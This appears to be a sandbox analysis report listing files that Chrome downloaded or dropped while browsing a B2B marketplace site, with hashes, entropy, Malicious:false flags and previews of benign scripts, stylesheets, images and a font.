                                                                                                          Preview:function _typeof(e){"@babel/helpers - typeof";if(typeof Symbol==="function"&&typeof Symbol.iterator==="symbol"){_typeof=function e(t){return typeof t}}else{_typeof=function e(t){return t&&typeof Symbol==="function"&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t}}return _typeof(e)}if(!window.jQuery||window.jQuery&&jQuery.fn.jquery.split(".")[0]==1&&jQuery.fn.jquery.split(".")[1]<7){(function(D,M){function p(e){return I.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:!1}function h(e){if(!ht[e]){var t=O.body,n=I("<"+e+">").appendTo(t),r=n.css("display");n.remove();if(r==="none"||r===""){mt||(mt=O.createElement("iframe"),mt.frameBorder=mt.width=mt.height=0),t.appendChild(mt);if(!gt||!mt.createElement)gt=(mt.contentWindow||mt.contentDocument).document,gt.write((O.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),gt.close();n=gt.createElement(e),gt.body.appendChild(n),r=I.css(n,"display"),t.removeChild(mt)}ht[e]=r}return ht[e]}function u(e,t){var n={
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4893), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4893
                                                                                                          Entropy (8bit):5.824114001525351
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D70B431E54BFD108D2C85F245F765F67
                                                                                                          SHA1:23BBC603EDF6EA41D01940A7B39E93D536A764FA
                                                                                                          SHA-256:E9979CB374448FC55E2BB0D9E21FCBB269787FED36C47990BC51E2BDA210282F
                                                                                                          SHA-512:A4507FCCD378A58776CE1F4E9B885112F9350E8A101E806931007E701075974C009CDE7F4BB43B46FC33D037B107083677221A635DF713F4234F88545F2D728E
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 25 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1022
                                                                                                          Entropy (8bit):6.140085685876624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0B75B35D7E5F9323852BE1FA2BF5D0CD
                                                                                                          SHA1:5F52422E3F535489BF4F94A0B8557A94ABD105D0
                                                                                                          SHA-256:D96E68D154422E95F54F121EF805A24DB93F0E1FC9C8D508B370EFDF289B6DC8
                                                                                                          SHA-512:948D5126094E78A460464A122B0E2C439A0DBDD1D4CFE93525B2DD2666C728BFF6087A2E2244D2722F29D8D73A8C6D64D9140F2DE18D416BB31B82038E474FBF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/img/home-2019/ani-arr-b_fafc1faa.png
                                                                                                          Preview:.PNG........IHDR................K....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:384D6EDC98BB11E9AB97AB0D53ED9AE3" xmpMM:DocumentID="xmp.did:384D6EDD98BB11E9AB97AB0D53ED9AE3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:384D6EDA98BB11E9AB97AB0D53ED9AE3" stRef:documentID="xmp.did:384D6EDB98BB11E9AB97AB0D53ED9AE3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......nIDATx.b...?.%.....<...@.....01P.p......bQ...O(.H@........4..k.......&.!.D1.......TN.8S..-9.+.R3.C-rD/V..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6926)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7027
                                                                                                          Entropy (8bit):5.438796272746742
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0C87398C839E37974D055034EFE091F2
                                                                                                          SHA1:65904B12085FBDA562ECEC645CD36B1594E1E3BC
                                                                                                          SHA-256:C4C54632EA9184A53656C81B402926E286E0E75011765FCE27EA8662273E1F38
                                                                                                          SHA-512:6F6789460B7C9250586E2EE76F81700A97110B26DBDCFEE6AA8C88C1055EF3A0FCA20F28A6F78AC8C7D2C51E27F16CA437F6AF2E05B31FBB02D2174F7FB32F9B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:var _templateResolve=function(){var u=/(.)^/;var t={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#x27;","/":"&#x2F;"};var l={"'":"'","\\":"\\","\r":"r","\n":"n","\t":"t","\u2028":"u2028","\u2029":"u2029"};var p=/\\|'|\r|\n|\t|\u2028|\u2029/g;window.__htmlEscape=function(e){if(e==null)return"";return(""+e).replace(new RegExp("[&<>\"/']","g"),function(e){return t[e]})};var e=function e(i,t,r){if(!i)return;var n;r={evaluate:/{{([\s\S]+?)}}/g,interpolate:/{{=([\s\S]+?)}}/g,escape:/{{-([\s\S]+?)}}/g};var a=new RegExp([(r.escape||u).source,(r.interpolate||u).source,(r.evaluate||u).source].join("|")+"|$","g");var o=0;var s="__p+='";i.replace(a,function(e,t,r,n,a){s+=i.slice(o,a).replace(p,function(e){return"\\"+l[e]});if(t){s+="'+\n((__t=("+t+"))==null?'':__htmlEscape(__t))+\n'"}if(r){s+="'+\n((__t=("+r+"))==null?'':__t)+\n'"}if(n){s+="';\n"+n+"\n__p+='"}o=a+e.length;return e});s+="';\n";if(!r.variable)s="with(obj||{}){\n"+s+"}\n";s="var __t,__p='',__j=Array.prototype.join,"+"print=fu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 24756, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):24756
                                                                                                          Entropy (8bit):7.991376479536492
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:98E1A744082BB639BAB406A7A0A09D2E
                                                                                                          SHA1:6022CF9B0503CD82B5C67E6D86345DCC319A324F
                                                                                                          SHA-256:C70712C04DB0807F2A9A07CC2207F847E6BCB86C611C7D3B98A8BE01BBF36FF2
                                                                                                          SHA-512:0801A69BE12AEB600FCCDF8562BBC567EBF65942667E327A881F7248D5D86B6CDA2678BF943DE5BD8B01E37ADB737C795FF1CD0D4EDDD44B616B13CFA9DF1101
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/053957/00000000000000007735cc67/30/l?subset_id=2&fvd=n4&v=3
                                                                                                          Preview:wOF2OTTO..`.......w...`X............................?DYNA.Q.b?GDYN.a.. .`..F.6.$......... ..v.T/...I..@U.CB..j..~..?...?....U. U.rO^.....~..'....o...s....eI.'..b...K..AiE..K].N]..... ..P.`.9..i.-..."~.......A...S5.Ij..x@.F.fJ*...r...'......Y.w..&o.{..X*.T+..VCIB...:)..J......XQQ.$.r&.?......;[l...B.s.c..7..`T......9..d.Ir......s...U..!UZD.E....!.+I...$.V..RZ..T..z*.?.+...o...WE.E].L...M{."{.H.t..,T.(...Q.i.1..IE\?......S..U*e...Ia.F..%..73os...!..~.......o.o.NNd.$ruj.i.....w.4..".:@...(.a..fU[YV..e..R4q9U..K...*.T.c....w0..e..8.Q...t}jksZ".*.....5...l.......~X.~.k..~....k.....Pj...VV."...t.V.8.....P..P[.PYbm..{..Y;.UU.....+.s...)..6.Jn...SQP..7...4.../...._....+6...4.u......OT).P..r...F.S...p?UsT.T....z..Z.9..5..o....9..F.L...a.....Qx....W......<.1.._.o..D^.Eg1H....z..d.H....N.K....y.<G.+{.>.-....E.h...P"JBY(......Vc.l......>....`..........?.$2.#... 3.B.L.I,.#k....l"..N..."....<$..c.|.....@.Ach"......!.......z..O.'...b"cL....l....3w...X8Kfm..u
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9401
                                                                                                          Entropy (8bit):7.894597598261747
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4442FAF399220C6D7F9A72027041918F
                                                                                                          SHA1:D81D0156AA3BBC09E86AC1AB931C6C66D92AB10E
                                                                                                          SHA-256:C00AF4A0440F6130A6ADF6F87A4B453EFD3754AE69F547CD2FD35AFE6CAB855E
                                                                                                          SHA-512:FCA5E7A84C82C001E7BF7596E34A5727FC52F9614FAB4A328D255A59F56F5A2DE997C8F022F1940FB4883B6D5A507EB7EB70DE43B63747916CD5444BF799120A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/8f4j00OyWfREQKOiVY/Fitness-Equipment1727707409000.jpg
                                                                                                          Preview:......Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="6E10DB969BB1EAFCACF2C38539A00DF8" xmpMM:DocumentID="xmp.did:62D1D15D7C7A11EF86DA88400A69C7B6" xmpMM:InstanceID="xmp.iid:62D1D15C7C7A11EF86DA88400A69C7B6" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:00fd468e-ef8e-454a-b5c8-ed723af79c2b" stRef:documentID="adobe:docid:photoshop:5a4854d7-2cdc-2f4f-8da2-19da6b83ab3f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2420
                                                                                                          Entropy (8bit):7.91277717218044
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:7EB1BCB16A4E8408F34EF4E611B43FAB
                                                                                                          SHA1:A34C58EEEE68D5C91D896F88CDCCFA2104600B8A
                                                                                                          SHA-256:A10B47C6CF21725F9636F714EF1A97BC95BA0059649EF6E58C5331DBC3009878
                                                                                                          SHA-512:D36A0356AE00A05EB3B12C282BE17268371E4DE52C389DC6A756BF38FD9FC277249DCE52228FBF218A155DE4CA4E56B653585F50A9128A1D674D038B1D138CC2
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://image.made-in-china.com/3f2j00lOmoZierKwqF/24V-250W-Folding-4-Wheel-Electric-Mobility-Scooter-with-Front-LED-Light.webp
                                                                                                          Preview:RIFFl...WEBPVP8 `...P....*d.d.>Q".E#.!.I.t8....h...XoR..........o....V.....w....}........qw....'...?8{..9..G...~\..Y.@.h~.....#.a}.?U..q......?..?..R|.}K.'._...>....f...q..K....*....p.1y.....P.7....~..$..._}..<_..}..dH....D.........R.....IF..._.....*............h..gL.T..K...G..5..mcq..ns....FN..B.J.......5#....i....5..m...[+....Ei....*.=.......A.....Z/..ay.{[T.D[.......Dl.......iE.8.7%.....5.w..v......F2.\...o.\..~........M....]:.YzO...Y..c`.g.......>.w....;...GG.Q.i=P.....F..l...-"M.S7.$.,Ljt.p~..0.6$.....9U#..&.E..j.....N.._..>F;m.\.'..3.A.T1&....X1...uf..M.....<(Zg.S........q...;C.2...}.-b....2..(H@N...gM<>.c......o.....Z.Q#...y...V..n.....z..w.j.N......5=....q.4dh.e....a.tD6.W.1..dSK.Vv.._.w..5H}.).J.=.=6.O.kz.a....PjF..m.H..!M:U.^{....;~..2...@.ki.r.a~..:...Lt..x.Z..*.g..8...b.P*C..2A.^...o...O.......q.k.o.'...'_...G......^....X..kp...O...>.21*...N....?..e.M........#g..d.Jo.#.0Q6....d..7..p.R....T.:..v].0..k.).eC._2.p....j:...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (428)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):515
                                                                                                          Entropy (8bit):5.468560582606357
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8D2AB26BF5692F62FC673F83B5BBB814
                                                                                                          SHA1:503046BE218472B6A38855CBC689A4FD5CAE6167
                                                                                                          SHA-256:D7ADD485D8DEA481E3DC45FD3184B6F12663B0F56091D1DA37460897BE3599DB
                                                                                                          SHA-512:2A9296F80C1A95FBA840FC65FBE042A8D814C3B449D8006AF17A5C745505DA5CD50119B2281FAE370842D15B5559D47EEBBB74CEA4B9A89B5AE407B5B4F50168
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:var sideBarInstance=null;void function(){window.SideBar&&(sideBarInstance=window.SideBar({navList:["RFQ","SERVICE","APP","FEEDBACK","TOP"],feedBackKey:"c1b4f833-eae9-49f8-9109-aa067e0e71f6",lang:"en",keyword:document.querySelector("#search-word-for-rfq")?document.querySelector("#search-word-for-rfq").value:"",userType:document.querySelector(".J-top-userType")?document.querySelector(".J-top-userType").value:""}))}.call(this);.//# sourceMappingURL=../../../__sources__/mic-search/js/home-2019/nav_a4a144aa.js.map.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):234
                                                                                                          Entropy (8bit):4.954868226378256
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8DDC2085159A8C504D6D65809FC96C0B
                                                                                                          SHA1:C1C8AC3429EE55A0E815836D6A594753CCBAB36D
                                                                                                          SHA-256:6ADD4EFED2EA0E656B59A168185168FD9E82BB8B1DB309F6C9865780B44D5275
                                                                                                          SHA-512:84AFCF1729683628C4304D90AE888860A5316C9C6FD73A6D857C5A4E6050721AE013B64DDCC22EC767787014D321F7DD4CC6FABEDC7A4CA3BF39102ED4F24934
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.made-in-china.com/head.do?xcase=getHead&&callback=jsonp_1728320966213_56176
                                                                                                          Preview:jsonp_1728320966213_56176({"login":false,"isOssLogin":false,"newMailNum":0,"canManageInquiry":false,"canManageInfo":false,"inquiryBasketNum":0,"rfqNum":0,"noticeNum":0,"unReadNoticeNum":0,"isForeign":true,"supplierEnableTrade":false})
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (63901)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):671665
                                                                                                          Entropy (8bit):5.679369532545344
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4330340D1AD9E7416457F705E64FC060
                                                                                                          SHA1:3800CBA62BF41A91D5B63D58AFBA74ECDE54B277
                                                                                                          SHA-256:A0CD60D53726644BF8CABF4C751AC3A02837571DB65F406EE6050D8B36CF3695
                                                                                                          SHA-512:E12E9F781A69FC5A6398E96B7BDD449F14C14B9F3617CB1ACD2ED50B64DC0AE2312FC8D2EEAC373B5FA41F0873885EC722DD133D6968CEC2C63598C82132D904
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://resources.usersnap.com/widget-assets/js/entries/setup/1cfa54fac939dcf3dc72.js
                                                                                                          Preview:/*! For license information please see 1cfa54fac939dcf3dc72.js.LICENSE.txt */.(()=>{var e,t,o,n,i={14147:(e,t)=>{"use strict";function o(e){if(void 0===e)return NaN;if(null===e)return 0;if("boolean"==typeof e)return e?1:0;if("number"==typeof e)return e;if("symbol"==typeof e||"bigint"==typeof e)throw new TypeError("Cannot convert symbol/bigint to number");return Number(e)}function n(e,t){return Object.is?Object.is(e,t):e===t?0!==e||1/e==1/t:e!=e&&t!=t}Object.defineProperty(t,"__esModule",{value:!0}),t.msFromTime=t.OrdinaryHasInstance=t.SecFromTime=t.MinFromTime=t.HourFromTime=t.DateFromTime=t.MonthFromTime=t.InLeapYear=t.DayWithinYear=t.DaysInYear=t.YearFromTime=t.TimeFromYear=t.DayFromYear=t.WeekDay=t.Day=t.Type=t.HasOwnProperty=t.ArrayCreate=t.SameValue=t.ToObject=t.TimeClip=t.ToNumber=t.ToString=void 0,t.ToString=function(e){if("symbol"==typeof e)throw TypeError("Cannot convert a Symbol value to a string");return String(e)},t.ToNumber=o,t.TimeClip=function(e){return isFinite(e)?Math.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 546 x 186, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):67833
                                                                                                          Entropy (8bit):7.983763621583374
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6DD0C24986D6AE4046D6FF290F674F6C
                                                                                                          SHA1:1CE5A19281AC99A948B65F0092EC487584999ECA
                                                                                                          SHA-256:543100569638E05B83A650F2E1E7E27FDB0B0E671FACA34A0EDBD4276F86ECDE
                                                                                                          SHA-512:6CC7A9D5DC783C2D8D20D171DE752A3C23D1FCE125E673DD9F835167DECE4CC307A993B47C5B696F804EC8DF78FD907857D3C3664A2BDB36B323917A63161870
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR..."...........&-...8iCCPicc..H..W.XS...[..@h.......)....B..........*vtQ......U..+ ....(..XPP..]y....+.|s..?g.s..w...v.#........1A~..I.tR. .......7O......../.n.D.^..j.......?.....q./....A..*.H...Q.M..I1.@K...x..g.q.....^.M\...6..T8.q....!O/.f@..~...<...5:...Sx..Bl.mD.K..i?.d.M3mX......... O............KXU2..1.9....*.*....""!....'....dJ......7..s.t v.q.C!6.8P.........l...A....q..B........,.....6..YL...#....z .g*._g...}L.03..b........U!v...U.+.dE..%1...!.......XA.80Fa_..74_ls.......3......Y.p..e...?.....64...?@>w../..U.|........QN...7...IyS....b.c.|. ..x.(?*N.'^........a.....H`M.S@..t.5....@..b....^...H....5...?!..q~.^>(...aV~......l...\..r...l.p.[.x...?.s`..xs`...{~...0!..`$C..jC....?1..H...qo....W_X.p..>4......N.#.uB...dA...(.A...T."..\..P.....:T.up}`.;C?L..zv.,K..4+....6.....HF.#.d.G.....Hs.c~...5........6.gKl1v.;....cG.F@.Z.&..;&...lu.y....u...7tg...s.u.u."...O....k.h.X...Og...Og.....N.N..H.....M.l.@t.s.....epp..w....}n..?...f.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1860
                                                                                                          Entropy (8bit):7.832821958681937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E06E543A8A134DC83A6DA261A7219034
                                                                                                          SHA1:54B1AD2E2E435F85ADAC850905A3EF2DDDD9B798
                                                                                                          SHA-256:F61ACB45FAEFE562CB79702965B966ACE874AB46F701AADB76A41B85C4D33454
                                                                                                          SHA-512:E5E3C3DE88989E86CF04CD706E2045BCBF5E44B69CBFC6F19A29EA2CDFDE2D88355E4068FFF72462025C46FFB3BF1CBF82A1DFB4CF16D5E161D8575029D51D48
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF<...WEBPVP8L/.../c.....m.F......I..".?.|....:..`2.m%.M.`.....w...^._.......".?.|....H.. ..P6....4Te.Vm;}...p\l..i. ..........~g.gS..cf...5..$IR$.<..g..{b.1}...U.)..3.U......FJw....m.m.m..m.g{....o)..79.v6xz...M....S..o.Lp....7.JzB"............x.u*....k....|3l...Cv..e....Y{.Bi.v..!X.$jb..l..k...'.`..-.....lp..%A...d{.....S.`.Xm.!J."%{.K..C0.....].E..v.@..... .k.R....h..Z.Y.......L....Jz.T.2..@...O.3X-..@9 4.I-.G.....ez. 3..6.......l.*.%....L....Q..mK.f........}..S....c.....v.=..|......<,.*..T....;...m4..=.....+.b.....^.$...^|.K.+.C.l...P.g5@.......{...H.........O.......'..'.Y.(a.....?%;Qe.m.s/u@....0.4.Bo.04.^~..M..s{.3.SN.a../...f;.G..@.=......9~....:;.R...<......w.<E.z...Z.:..}....r....m.@.0.@D.m.m....0w..D.0.%.lC{..M....;.d..E.E"M...8..al..L.......$........S.I.....t.=......ZW@...^..T..?.Z.2.q..^C..P..e%4.a.0.&.n.....a.e..$..|5..H..^..Z..........6./.....*.:2...=..GV.uP.D.......P.I{.....tV.*.....9.}.By.>......:;pu....l.$...3.9..,.+....A
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9605
                                                                                                          Entropy (8bit):7.9178875149470995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6B6C04E7AD000CB60D9DBCD37BFD92C1
                                                                                                          SHA1:C8DB48B05103CB41B33EB0A4E8D8A2B69AD467CE
                                                                                                          SHA-256:5C5A27EBE21349E48C121426033DCE7AB8A003A313576157D6AA0B8136D7613A
                                                                                                          SHA-512:2E26A2DE95E64390817AD90F9752D128703C12C754238D1C6B1E8748068FA4D1FA6117CCDDCE7EB1F6BA200864E897CFCB60054459841FA50AF9BA4DFADDF438
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......2.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="983F7386DEA5A81FAC022E2E9E2C4BD5" xmpMM:DocumentID="xmp.did:109AFAEF7C7A11EF86C192CA0CDC114C" xmpMM:InstanceID="xmp.iid:109AFAEE7C7A11EF86C192CA0CDC114C" xmp:CreatorTool="...."> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5e8de3d9-8a35-1b46-a108-2fc34895e346" stRef:documentID="adobe:docid:photoshop:1103145b-b27e-7e4f-8aed-a1053475ee76"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...HPhotoshop 3.0.8BIM..........Z...%G........8BIM.%............x/4b4.X
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (46829)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):46926
                                                                                                          Entropy (8bit):4.9777073530601275
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E3A4298A3DE237D42A8A15FD15B2918D
                                                                                                          SHA1:6AC5AA02753BB90FABC1C245F1D02BD030D882D8
                                                                                                          SHA-256:028CB446D4F15AFDC9CE83E66ADCBADB68557BC25114C59E869F05E98296BAF2
                                                                                                          SHA-512:49E9003E83C1F33B2B5AB01459AC3B0A04A77C2EB65CF4A09E201C7883AA8AA3A32A6D6F86217E40D6F7C6A578A20191AFA5C257247CAE7AE012FDE403CEBF84
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/nail/pc/ssr/client/header-home_b9520b6e.css
                                                                                                          Preview:@charset "UTF-8";.nail-logo{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.nail-logo .logo-link{display:inline-block;background:url(//www.micstatic.com/nail/img/logo_pc.png) no-repeat;background-size:100% 100%;width:218px;height:42px}.nail-logo .sub-logo{height:22px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;margin-left:10px;padding-left:10px;border-left:1px solid #e6e7eb;font-weight:400;text-decoration-line:none;color:#222}@media only screen and (max-width:1024px){.nail-logo .logo-link{display:inline-block;background:url(//www.micstatic.com/nail/img/logo_m.png) no-repeat;background-size:100% 100%;width:201px;height:39px}}.nail-logo.sa-layout .sub-logo{margin:0 10px 0 0;padding:0 10px 0 0;border:0;border-right:1px solid #e6e7eb}.nail-popover-trigger{position:relative;display:inline-block}.nail-popover{position:absolute;min-width:100px;z-in
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (649)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):741
                                                                                                          Entropy (8bit):5.412313755036768
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2FC965BF61492B5E273F9A3FEC7D4E4F
                                                                                                          SHA1:6602FEB209D55467FDF45FADF4E77CC868C83BEB
                                                                                                          SHA-256:3E95D17B151F6150FC7859A22FFCC6AACC841CEC35F2DD1C10DA281EAE31D526
                                                                                                          SHA-512:ACEC61F86BEB03EE4359507F0CBE6D7F1233AE17EC38B55A1AE9773DDBCDC6412CF0FEA3871574F259EA774F879C0E023762182F5A17B970F2E022B84F45C7D5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
